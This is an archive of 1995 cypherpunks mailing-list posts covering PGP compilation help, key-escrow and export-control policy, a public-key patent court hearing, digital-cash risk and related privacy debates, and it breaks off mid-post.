From: "David E. Smith" <dsmith@midwest.net>
Date: Wed, 6 Dec 95 11:03:26 PST
To: "Daniel 'genius' Charpentier" <drcharpe@hamlet.uncg.edu>
Subject: Re: PGP
Message-ID: <199512061921.NAA00167@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 12:54 PM 12/6/95 -0500, you wrote:

>   I've tried to find out the answers to my
>questions myself but I haven't been very successful.
>Actually, I haven't been successful at all.  First of all,
>I've been using PGP on my computer but when I tried to port it
>over to my unix account it didn't work.  I took the source code
>and tried to compile it using the unix g++ compiler but it gave
>me all of these errors.  Where can I find PGP that is already
>compiled for unix or at the very least will compile for unix?
>Secondly, if I create a program that makes using PGP more
>user friendly can I let other people have it ( for FREE )?
>Lastly, what is considered overkill with cryptography?
>I don't believe anything is.  My programs accept what the user
>inputs for how large prime numbers should be ( my public
>key programs ) but I make them able to accept values that go
>up to 30720 bits ( I don't believe a number can ever be large
>enough ).  You can never be to safe...never.

Firstly - and don't take this personally - how much computer
knowledge do you have?  The PGP sources use all sorts of
#ifdefs and other kludges.  A fair amount of C coding
ability is needed to get the damn things to do much of
anything.  (Hell, I can't read most of it - my precompiled
MSDOS version does what I need it to do.)

If you make PGP more user friendly... well, PGP 3.0 is still
coming Real Soon Now (TM) and it will include an API that
will make hooking into it ridiculously simple.  Beyond that,
there are already a number of good DOS and Windows shells
for it, and nobody on unix-flavoured systems expects a clean
user interface anyway :)  (Well, except for XWindows...)
But, if you write it - and I'm cautioning you to be sure
you don't reinvent the wheel - you can distribute it freely.
I suggest using the terms of the GNU GPL.

And the key values - well, you can give it 32k bits, but 1.
generating a key pair could take a prohibitively long time;
2. nobody else can use it (the default PGP distributions
are capped off at 2047 bits).

Good luck.
Dave
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMXoSwwyfvCScyE5AQEwtQQA0IHRhQiBej05B8KfFMJh95+XVvzW5ax1
SgQGrNABIdnyOkDSgPLA97vQ04agU8ytOyaDMW/X4IuI/zZgsqOzegsb57+TEcAz
sB7mvzmW0tTrEEdMRjBkaZRAnf0wTrf2EqtR3lshJCgzK1MB6szG3w4N8yb26YKD
2VyBrX10nRY=
=sRw4
-----END PGP SIGNATURE-----
----- David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745
+1(573)339-3814, "dsmith@midwest.net", PGP ID 0x92732139
http://www.midwest.net/scribers/dsmith/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Wed, 6 Dec 95 11:03:24 PST
To: SBinkley@atitech.ca (Scott Binkley)
Subject: Re: GAK
Message-ID: <199512061921.NAA00175@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 11:56 AM 12/6/95 EST, SBinkley@atitech.ca wrote:

>I heard a while back about being able to "split" up a PGP key.
I suppose you could, with some variant of Shamir's secret-
sharing scheme.  I'm not familiar with any specific
applications that do this.  (But that's irrelevant.)

>What about splitting up the key into many parts, and giving
>them out to multiple INDEPENDANT agencies.  ie: One piece
>goes to the FBI, one to the NSA, one to some other committee,
>and so on.  That way, no goverment body could just tap your
>conversations without getting approval from others, and
>gaining the pieces of your key.
That still doesn't address the basic issue - that the government
has NO RIGHT to access our _private_ keys.  If you want to
assume a fairly paranoid threat model, each of these different
agencies will instantly combine their parts to generate the
whole key.  If you trust the government, it might work.
Personally, I trust the government about as far as I can
throw the typical Man In Black.

Dave
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMXoeAwyfvCScyE5AQEFqQQAihutub3GQDi/FtiDkAfxgb8dzFAEnZ/H
LD588iuIxX3G3M0fLmAkRuUKE7fdhExkAO1IYFwH0oM/bI8KdSrY/RyeqnQFRwVo
/Vvr6nwVMdLP94Vt9Gi4QXJ4dVBHXwfvRUm5/HdLqqh8UH2HLKO1jdt82H539paM
ZhiZkMmNlCs=
=0kWW
-----END PGP SIGNATURE-----
----- David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745
+1(573)339-3814, "dsmith@midwest.net", PGP ID 0x92732139
http://www.midwest.net/scribers/dsmith/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Wed, 6 Dec 95 13:40:05 PST
To: Ernest Hua <hua@chromatic.com>
Subject: Re: Solution for US/Foreign Software?
Message-ID: <m0tNR0t-00093sC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>> I'm not saying they are a "bypass" of the laws.  Rather, I'm saying that
>> if the goal is to:
>> 
>> 1.  Let companies like Netscape make foreign sales.
>> 
>> 2.  Still comply with the letter of the law.
>
>It takes more than one or two people to coordinate an international effort.
>Once more than a few people know about it, it becomes "company policy" or
>"corporate objective", in which case, the NSA/DoS will eventually figure it
>out and start levying heavy fines and jailing the individuals.

You miss the point!  There will be no "international effort"!  Here are the steps:

1.  Write a program limited to keysize, carefully constructed to isolate those portions of the program which define key size, GAKedness, etc.
2.  Get it export approved.  Export it.

THEN

3.  Announce that a "US-only" version of the same program is being released, and include the minimal component which replaces the limited software.  Release it, only in the US of course!


>The main point is that there is no such thing as the "letter of the law".
>What they enforce is much broader than that, and how they enforce it is much
>more subtle than clear-cut criminal prosecution.  Therefore, you cannot just
>use literal loop holes just because it's not clear, because the law they are
>enforcing is not clear either.

The system I describe doesn't even violate the spirit of the rules.  If anything, it bends over backward to implement a foreign version of the software which ALREADY is export-approved at the time it was, um, upgraded.

True, it's possible to sneak the extra component out of the country, but hey, it's also possible to sneak an entirely new program out of the country.  I'm not suggesting that the company who writes the component takes it out, it'll happen regardless.

If the order of the versions was reversed, the USG might complain that the export version was "too similar" to the domestic version.  That's why you wait for the export approval before you write the domestic version.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Wed, 6 Dec 95 13:24:11 PST
To: cypherpunks@toad.com
Subject: Roger Schlafly's court hearing today
Message-ID: <199512062111.NAA01734@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



Roger Schlafly had a brief hearing this morning in Judge Williams
federal court on summary judgements with respect to the validity of
the various public key patents, and alleged anti-trust and unfair trade
practices.  Bob Wells and I were the only pro-tossing-the-patents out
people there, although sometimes-cypherpunk-meeting-attender Whit Diffie
was there as well.

The judge said right at the outset that he would not be making a decision
today, that he wanted guidance from Roger and the other sides lawyers about
the relevant issues, to help him wade through the tremendous amounts of
documentation provided.  I suppose that this could be expected, but the
issues here seemed to me, at least, to be relatively clear-cut.

There were basically four issues to be discussed, the Diffie-Hellman,
Hellman-Merkle, and RSA patents, and these unfair trade practices.
The judge had only allocated an hour for this discussion, and then
showed up 20 minutes late, which proved inadequate.  Still, I thought
that everyone was remarkably clear and concise with their answers, and
the judge asked reasonable questions.

First discussed were the unfair trade practices, where the lawyer for
what used to be PKP dragged in a lot of dirty laundry from the past,
describing why Roger got interested in this in the first place.
I don't understand what the complaint here was, the PKP lawyer said
that since Roger didn't have a product, what was he complaining about,
anyway?  It seemed like an odd defense to me, but again, I don't know
exactly what Roger's complaint was.  Roger agreed with the judge that
yes, everything he wanted to say was in his submission.

Next discussed was the Diffie-Hellman patent.  Roger stated that he had
four clear instances where the an "enabling disclosure" was made about
Diffie-Hellman; three were presentations to large audiences, and one
was a pre-print of the famous "New Directions in Cryptography" paper.
Roger actually had the viewgraphs that Diffie used in his presentations.
These disclosures were all made more than 1 year before the patent was
filed, which is the limit in the US.  The lawyer from CalCan (something
like that) handled this one.  He said that the law specifically mentioned
publication, and that none of these was a publication.  I'm not sure
what the law says, and Roger disputed the claim that that is what the
law says.  Disappointingly to me, it appears that neither Diffie or
Hellman have any recollection of when, to whom, or how many preprints
of the article were sent out.  It's terrible how the law seems to cloud
people's minds, isn't it?  What little I do know about patent law
tends to support Roger on this one, I think that it should be an open
and shut case, but we'll see.

Then we came to the Hellman-Merkle patent, which basically claims all
of public-key cryptography.  Roger's claim here was that the mechanism
described doesn't work, because knapsacks don't work, that is, the
invention is supposed to make generation of the decryption key infeasable,
by a very specific description of infeasability in the claims of the patent.
(10^30 arithmetic operation necessary)  Well, that's not true.

The same lawyer for the other side took this on two different ways:
1) that nobody knew that knapsacks were insecure at the time that the
   patent was filed, how could the patent be found invalid based on something
   that happened later

2) and some variations (dense, iterated knapsacks) might still be secure.

Roger presented an analogy.  Say someone was able to persuade the patent
office that a drug cured cancer, and so he was able to obtain a patent on
it.  Later, it was found that the drug killed everybody who took it.  Should
the patent be valid, if it really didn't do what it said that it would?
Roger could have gotten melodramatic, and said that bad cryptography could
really kill people, and has many times, but he didn't; as I said, everybody
was remarkably concise and to the point.

Even so, we were out of time here, not having discussed the RSA patent
or the Schnorr patent at all.  The judge said that he will call another
hearing if he feels that it is required.

I thought, in my incredible naivete, that it went really well for Roger,
although I didn't have time to hang around and ask him how he thought it
went.  I think that his arguements are good, and if the law is sensible
he will prevail.

thad
-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-2244




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 6 Dec 95 10:22:47 PST
To: Futplex <futplex@pseudonym.com>
Subject: Re: NIST GAK export meeting, short version
In-Reply-To: <199512060426.XAA20883@thor.cs.umass.edu>
Message-ID: <Pine.SUN.3.91.951206132336.19360H-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Dec 1995, Futplex wrote:

> This answer sounds rather silly to me. Do they seriously doubt that the
> escrow mechanism works (modulo MAB's observations about the LEAF), or expect 

No.  They doubt that "software binding" works, ie are afraid someone will 
figure out an easy way to hack the software to by-pass the escrow mechanism.

> us to believe that they do ?  Clinton Brooks' comments cited later by Pat
> suggest a certain acceptance that enforcement will have its problems
> (e.g. strong crypto tunnelling), but perhaps Greiveldinger somehow doesn't
> officially share that view. Is there another interpretation of "working"
> I'm missing here ?
> 
> -Futplex <futplex@pseudonym.com>
> "I'm from the D.O.E. and I just need to leave this here temporarily"
> 	(from a political cartoon entitled "The 3 Biggest Whoppers")
> 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Wed, 6 Dec 95 13:53:18 PST
To: cypherpunks@toad.com
Subject: Re: Geodesic Payment Systems? (was Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment)
In-Reply-To: <Pine.SUN.3.91.951206104553.24528A-100000@eskimo.com>
Message-ID: <199512062154.NAA20063@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai writes:

> > [ infinite-cost risk ]
>
> ...
> The direct cost of a break-the-bank catastrophic failure is bounded by the 
> amount of capital the bank has.  This is because the market will not 
> accept more liabilities (real or forged) from the bank than its capital.  
> There may be other indirect costs resulting from dislocations, but these 
> should also be proportional to the size of the bank.  Therefore your 
> argument is really against centralization and for diversification and 
> distribution.

Why "the bank", rather than "all banks"?  If there is a single
cryptographic point of failure in a widely used ecash system,
it seems unlikely that diversity would buy you anything.  The
worry would not be the compromised keys of a single bank, but
rather, say, an effective cryptanalysis.  I would put this in
the supernova class; it may be just as unlikely.

Peter Monta





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Dec 95 12:41:42 PST
To: cypherpunks@toad.com
Subject: Re: News on Congressional Debate on Exon
Message-ID: <aceb402d1d021004fc00@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:31 PM 12/6/95, attila wrote:
>    well, there goes the neighborhood.
>
>    guess I better clean up my www front page which meets the Exon rules on
>indeceny, pisses on ITAR, and is probably seditious as well. might as
>well get a start on it before the eager beavers hemorrhage!

In case anyone's worried about the short-term implications, you'll all have
plenty of time before enforcement starts. The conference committee has to
OK the final form, voting, etc., then the Prez has to sign it (or pocket
veto it, which is unlikely in the extreme). I'm no longer current on
schedules as I was in high school civics class, but I think it will take
effect some weeks or months after being signed into law.

And even then I think prosecutions will take a while to get rolling, as
cases are considered. It's not as if overnight the cops will be raiding
sites.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DANIEL CHARPENTIER <drcharpe@hamlet.uncg.edu>
Date: Wed, 6 Dec 95 11:07:07 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: PGP
In-Reply-To: <199512061853.MAA17582@spirit.sctc.com>
Message-ID: <Pine.SOL.3.91.951206135618.5233A-100000@hamlet>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Dec 1995, david d `zoo' zuhn wrote:

> Also, you can have keys that are too large.  Do you want to take hours to
> encrypt a simple file, just because you have a 30000 bit key?  Do you
> expect your recipients to take the same amount of time (or more) to
> decrypt it?
> The tradeoff between cost & security is probably too high in that case (I
> surely wouldn't bother to decrypt anything you sent me if I had to wait
> hours or more).

    Now be practical.  You do have options.  Just because you have the 
capability to encrypt with a 30000 bit key does NOT mean that it is
mandated that you encrypt with a 30000 bit key.  The reason that cypherpunks
is even in existence is that sometimes privacy is a must.  Sometimes
you want to make sure that a common thief can not read your files and 
others you want to make sure the N.S.A. can not read your files.  This
is not in dispute.  We all know this.  Having the option is comforting ( in
my opinion of course ).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Wed, 6 Dec 95 11:24:02 PST
To: nsb+limbo@nsb.fv.com
Subject: Re: Geodesic Payment Systems? (was Re: Meeting notes from ANSI X.9Meeting on Electronic Payment)
Message-ID: <01HYHNP19ND89S3REI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"nsb+limbo@nsb.fv.com"  "Nathaniel Borenstein"  6-DEC-1995 07:21:19.03

I had assumed that there was a market discount, but it's still not quite
that simple.  It's very hard for markets to deal with *unbounded* risk. 
The biggest problem I see with most of the crypto-cash schemes is that
there is a legitimate scenario -- however low-probability you might
assess it to be -- of break-the-bank catastrophic failure, i.e. in which
someone gains the keys that allow him to essentially print money.  This
kind of low-probability, infinite-cost risk is the kind of thing that
gives underwriters the heebie jeebies.  There's a good reason that most
companies have "Ltd" after their name instead of "Unlimited", in those
countries where that's the naming convention.
--------------------------
	The risk in question is not infinite-cost. If the person who gets
ahold of the keys starts simply making lots and lots of money, in a free
market the prices in digital cash for everything will start going up. This
phenomenon will be spotted, and those taking the particular variety in
question will stop accepting it. Losses are limited to however much was out
there at a given time, and if there are multiple systems with free-market
interconversion between them, that may not be very much. People will move
out of a decaying monetary system if: A. the new system is as easy to get
as the old; and B. the new system is as easy to spend as the old.
	If the person who gets the keys simply uses them on a small scale,
then the resulting inflation and loss of value can simply be dealt with
using the discount mechanism. It's no longer infinite risk.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 6 Dec 95 14:22:48 PST
To: cypherpunks@toad.com
Subject: Cyberia-L Archive [was Re: ERA_sur]
Message-ID: <Pine.ULT.3.91.951206142028.4575V-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


As somebody pointed out to me, Cyberia-L, like cypherpunks, is archived 
on http://www.hks.net/ and the public news server nntp.hks.net.

Now send them some of the money you're going to make from the stock market.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DANIEL CHARPENTIER <drcharpe@hamlet.uncg.edu>
Date: Wed, 6 Dec 95 11:26:46 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: PGP
In-Reply-To: <199512061921.NAA00167@cdale1.midwest.net>
Message-ID: <Pine.SOL.3.91.951206141124.5233C-100000@hamlet>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Dec 1995, David E. Smith wrote:

> Firstly - and don't take this personally - how much computer
> knowledge do you have?  The PGP sources use all sorts of
> #ifdefs and other kludges.  A fair amount of C coding
> ability is needed to get the damn things to do much of
> anything.  (Hell, I can't read most of it - my precompiled
> MSDOS version does what I need it to do.)


    Sorry...I was always taught that the user should not
be mandated to finish the job of the programmer.  Please,
do not take me wrong, PGP is a remarkable tool...but I
was not aware I had iron out the bugs.  That part is the
easiest to do compared with the genius of the program...
but I still should not have to do it.


> If you make PGP more user friendly... well, PGP 3.0 is still
> coming Real Soon Now (TM) and it will include an API that
> will make hooking into it ridiculously simple.  Beyond that,
> there are already a number of good DOS and Windows shells
> for it, and nobody on unix-flavoured systems expects a clean
> user interface anyway :)  (Well, except for XWindows...)


       Well maybe they ( people on "unix-flavoured systems" ) should
expect a clean interface.  If the interface were more sound then
maybe the common man ( person ) wouldn't be so scared of it.  I have 
a lot of friends that gave up on cryptography because they could not
get the darned programs to work ( at least the good ones anyway ).

         

> And the key values - well, you can give it 32k bits, but 1.
> generating a key pair could take a prohibitively long time;
> 2. nobody else can use it (the default PGP distributions
> are capped off at 2047 bits).

    I was not using 32k bit keys with PGP...but I'll look at the
code.  To tell you the truth I never thought about modifing PGP
to generate that large of a key.  When I finish it I'll post the
source here.  I'm sure someone here would like to at least have
the option.



    Thank you for the input.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Wed, 6 Dec 95 11:32:59 PST
To: hal9001@panix.com
Subject: Re: Secret Clearance
Message-ID: <01HYHO17G39Y9S3REI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"hal9001@panix.com"  "Robert A. Rosenberg"  6-DEC-1995 12:50:58.52

The problem is that they are subject to blackmailed/bribed/subversion ONLY
because the employer will use the info as an excuse for firing/restricting
the employee. If someone has a "skeleton in the closet" such as being gay,
so long as the employer does not discrimate against gays who INFORM the
employer of their sexual orientation or if the employer does not care about
the person being gay (ie: removes it a potential blackmail threat) there is
no problem so far as I can see. It is only when there is something that is
WORK RELATED which would affect the person's performance if not known that
the question of a background check is relevant.
-------------------
	Unfortunately, this only works if one assumes that work is the only
thing that is valuable in the person's life. Blackmail can easily be used
against someone who is afraid of some information emerging to their family,
for instance. This perspective still isn't an excuse for disallowing gays,
however... the person who should be held responsible for such problems is
the person who responds negatively to the revelation. In other words, if the
person's family would react negatively to the person being gay, that's the
family's problem, and should be treated as such.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 6 Dec 95 11:38:05 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: re: NIST GAK export meeting, sv
In-Reply-To: <199512052356.AAA09563@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.91.951206143218.19801G-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Imagine you are in the Justice Dept.  You have to work out a policy for 
escrow agents because your boss says so.  You begin to work out 
scenarios, just like when you design software.  One scenario is that the 
FISA court issues a warrant for a wiretap/decrypt of a suspected foreign 
agent.  The fact of the order, and esp. the ID of the target, have a 
SECRET classification.  It is a crime to show a SECRET document to a 
person without clearance.  Yet, escrow agents can reasonably refuse to 
disclose a key (indeed, SHOULD refuse to disclose a key) without seeing a 
real warrant.  

How do you solve the problem?  (Hint: asking Congress to change either 
the classification laws, the FISA court rules, or the GAK policy are not 
options.)

I'm certain the above was a large part of their thinking in adding the
requirement of a SECRET cleared person.  If you accept their premises --
note the "if" -- it makes a certain degree of sense.  I offer the 
following two bets for which I have no evidence:

1) This will be the PR that most damages the proposal
2) If they ever actually implement the policy, they will give the 
clearances out as fast as they can, just to show good faith.  Not that 
SECRET is a very high clearance any more, anyway....It's main value is in 
giving them another way to jail you if you leak the fact of the order and it 
ruins the investigation.  (Plus, I suppose, obstruction of justice...)

CRYPTO: Does anyone recall the cite for a paper a few years that set out a
way to have escrow agents who would be "oblivious" to the identity of the
subject of the warrant?  And how would such an escrow agent be sure that
they were not being duped by the feds? 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 6 Dec 95 14:41:25 PST
To: cypherpunks@toad.com
Subject: Press Release on Response to Microsoft Internet Announcements
Message-ID: <Pine.ULT.3.91.951206142716.4575W-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I just posted the following from stanford.edu; it probably won't be
approved and propagated in time, though. 

By the way, alt.internet.media-coverage, to which someone pointed me, is 
explicitly *not* for press releases. 

I do not plan to utter the string "cypherpunks@toad.com" because I think 
there's enough noise here already (some from me). 

Apologies to sameer for being presumptuous, but I did say "hope," and I 
also think tomorrow would be a really good time to document the .PWL file 
bugs...

- -rich

- ---------- Forwarded message ----------
Date: Wed, 06 Dec 1995 14:39:23 -0800
From: Rich Graves <w95netbugs@aol.com>
Newgroups: misc.news.internet.announce, misc.news.internet.discuss
Subject: Info on Microsoft Internet Announcements Thursday, December 7, 1995

Please reply, if necessary, to the address in the current FAQ, because I 
very seldom actually log on to America "On Line." Before forwarding this 
along, please check whether this has already been done; and let me know 
after the fact.

As has already been announced in the print press, Bill Gates, who works 
at a large software company, will hold a press conference tomorrow, 
December 7th (a date with some historical significance), to announce 
Microsoft's Internet strategy.

For information on Microsoft-sponsored marketing events in your area, 
please see http://www.microsoft.com/events/

Approximately fifteen minutes after Mr. Gates begins speaking (anyone 
have the exact schedule? please phone me), we hope to release very 
significant updates to the following Internet sites:

http://www.c2.org/hackmsoft/
  [information on a few security problems with Microsoft products]

http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html
  [canon URL; multiple DNS-load-balancing SPARCServers]

http://www-dccs.stanford.edu/NetConsult/Win95Net/faq.html
  [use this mirror of the above if you have an old DNS server that
   barfs on the www-leland lbnamed tricks]

news.answers, comp.answers, comp.protocols.tcp-ip.ibmpc, and several
higher-traffic groups will receive a text rendering of the above. This 
will be the first approved and rtfm-archived posting; the news-answers 
folks got back to me last week.

gopher://quixote.stanford.edu/1m/win95netbugs will get a text rendering 
of the above, and contains relevant messages from an email discussion 
list.

An email autoresponder to be named later (finger 
llurch@elaine.stanford.edu in the morning).

The various archives on http://www.hks.net/ have additional information 
for the technically minded.

A PGP-signed copy of this announcement is available on request, but I 
don't want to confuse the unwashed masses unnecessarily.

- -rich
 "A day that will live in infamy"

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMYaz43DXUbM57SdAQEeDQP/a8ZccX4fpMbKCNa6Cllii0qWI6A8oUKH
30fdoGl1HvlgWVhsB0paVLsQS8tQGsVt/MzKJLasTsnKuYVJCmdgmXcj9nEE9YIY
SxBEDn6yGno2ey7G1lXJSkeVAjB8o/fX+kZXGNKfOGKgNqjIl12jHbW7NX1bsIKi
wQl/s4uikQs=
=6Z1M
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@ATHENA.MIT.EDU>
Date: Wed, 6 Dec 95 11:42:08 PST
To: DANIEL CHARPENTIER <drcharpe@hamlet.uncg.edu>
Subject: Re: PGP
In-Reply-To: <Pine.SOL.3.91.951206141124.5233C-100000@hamlet>
Message-ID: <199512061943.OAA22480@charon.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


The PGP sources build on most UNIX platforms.  Have you read the
setup.doc?  Have you followed the instructions?  What Unix platform
are you using?  In general, all you need to do is:
	1) build rsaref:
		cd rsaref/install/unix; make
	2) build pgp:
		cd src; make <platform>

Modulo a few quirks, that should be all.  Look at the PGP FAQ,
Buglist, Fixes, and Improvements Page for a list of known bugs+fixes
in PGP 2.6.2:
	http://www.mit.edu:8001/people/warlord/pgp-faq.html

If you need more help, email me offline (i.e., do not cc: cypherpunks)

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hroller Anonymous Remailer <hroller@c2.org>
Date: Wed, 6 Dec 95 14:58:26 PST
To: cypherpunks@toad.com
Subject: [NOISE] Re: PGP
Message-ID: <199512062254.OAA12338@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> > you really ought to be more thoughtful about what and how you write on 
> > the cypherpunks list...

** Vast numbers of double spaces deleted **

>     The how is referring to not double spacing isn't it.  Sorry,
> I've been up for the last couple of days and didn't even realize it.
> What do you mean what I write about?   

He means that this is NOT alt.security.pgp - we are not here to teach you 
how to use a bloody C compiler or to summarise README notes for you. 
RTFM.

> > anyway,  the PGP code from MIT should compile on nearly all unix 
> > machines.  i'm not sure it will compile with a g++ compiler though.  all 
> > unix type machines should have uncompress, tar, (g)cc.  just get the 
> > source from MIT.
> 
>       I am not an idiot.  I must have downloaded PGP from about 20 million
> different places.  They are all either missing files, some times the
> darn code won't compile, or when I "tar xvf" half of the files bring
> up an error and the computer says it can not create the file.  I'll try
> the address that you've sent.  Hopefully I will have better luck. 

You want help, but supply minimal information.
Post your problem to the appropriate place - alt.security.pgp, and supply
a bit of information - what version of the source are you trying to 
compile, what Unix platform, what version of the C compiler, etc.

>       In the persuit of constructing a stable cryptographic program
> that uses PGP what features should be included.  Obviously all of
> the ones that PGP has and encrypting/decrypting e-mail but what else?

?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 6 Dec 95 13:24:47 PST
To: nobody@replay.com (Anonymous)
Subject: Re: NIST GAK export meeting, sv
In-Reply-To: <199512060335.EAA20054@utopia.hacktic.nl>
Message-ID: <199512062125.QAA14673@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous writes:
>What
>troubles me is the suggestion that *every* agent *must* hire someone who
>might answer to a higher authority, as it were. And what troubles me more
>is watching this paragovernment's transparent efforts to reproduce itself
>step by step, always trying to elude efforts to make it accountable or
>subordinate to civil authorities.

Whoa.  Time-out.  Having a SECRET clearance does not imply that one is
answerable to the government.  You don't get a clearance independent of
a job.  You have to be hired for the job, then the investigators look
for anything that might disqualify you, then you get the clearance.

A key-escrow company could hire anyone they want.  Assuming that
they're approved for a SECRET billet when they're approved as an escrow
agent, the *company* designates the individual the government is to
investigate.

The only leverage the government really has is the right to take the
clearance away.  The person (and probably the company) could sue for
its return if it was really done as a pressure tactic.  The guidelines
for approving or denying such clearances are pretty specific.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 6 Dec 95 12:53:03 PST
To: cypherpunks@toad.com
Subject: Re: No More Netscape Comments from Me
In-Reply-To: <199512061647.LAA12675@jekyll.piermont.com>
Message-ID: <XZFPFD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:
> Robert Hettinga writes:
> > >So, have fun riding the Great Internet Bubble of 1995!
> >
> > Yeah... I wonder what the price of Netscape puts around, say, March are
> > these days...
>
> No conventional options are available on Netscape yet. The price on
> custom options is high, and you have to trade a very large (quarter to
> half million dollar) sum in order to get them.

But you can already sell it short. (I.e., you sell shares of Netscape now
for future delivery, hoping that before the time you must deliver them, the
price will go down and you'll be able to buy the shares to cover the sale
at a lower price than you sold them for.)

Someone I know sold a bunch of Netscape short about the time the various
cracks were announced on this mailing list.  Unfortunately for him, the
price didn't go down.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 6 Dec 95 15:35:15 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: NIST GAK export meeting, short version
Message-ID: <199512062336.PAA13924@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:26 PM 12/5/95 -0500, Futplex <futplex@pseudonym.com> wrote:
>> and on the 64-bit issue, that the government is "not certain it will
>> work." he says they "want to see it implemented and want to see
...
>This answer sounds rather silly to me. Do they seriously doubt that the
>escrow mechanism works (modulo MAB's observations about the LEAF), or expect 
>us to believe that they do ?  Clinton Brooks' comments cited later by Pat
>suggest a certain acceptance that enforcement will have its problems
>(e.g. strong crypto tunnelling), but perhaps Greiveldinger somehow doesn't
>officially share that view. Is there another interpretation of "working"
>I'm missing here ?

"Works" means a lot of things, even if you limit the discussion to official
court warrants requested with honest affidavits.  The code is supposed to 
discourage tampering, but suspects may still successfully disable GAK.
Escrow agents are supposed to deliver the correct keys successfully without
losing them (or storing them safely in the basement next to the cyclotron),
